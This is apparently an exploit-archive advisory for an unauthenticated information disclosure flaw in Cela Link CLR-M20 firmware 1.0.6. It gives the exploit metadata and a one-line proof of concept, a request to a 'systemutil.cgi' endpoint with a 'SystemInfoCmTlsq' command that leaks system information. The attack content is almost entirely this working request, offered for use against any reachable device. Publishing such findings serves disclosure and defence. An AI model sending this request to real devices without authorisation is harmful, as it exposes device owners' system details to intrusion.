Cela Link CLR-M20 1.0.6 Information Disclosure

Cela Link CLR-M20 version 1.0.6 suffers from an information leakage vulnerability.


MD5 | 190f8e34a676b8ee7787d2138d6736bb

# Exploit Title: Cela Link CLR-M20 sw version 1.0.6 - Information Disclosure
# Date: 2018-12-27
# Exploit Author: Mr Winst0n
# Software Link: http://www.celalink.com
# Version: 1.0.6
# Authentication Required: No
# Tested on: Linux

# This vulnerability allows information disclosure by appending
# "/cgi-bin/systemutil.cgi?Command=SystemInfoCmTlsq" to main page

# PoC:

http://target_ip:8081/cgi-bin/systemutil.cgi?Command=SystemInfoCmTlsq



Related Posts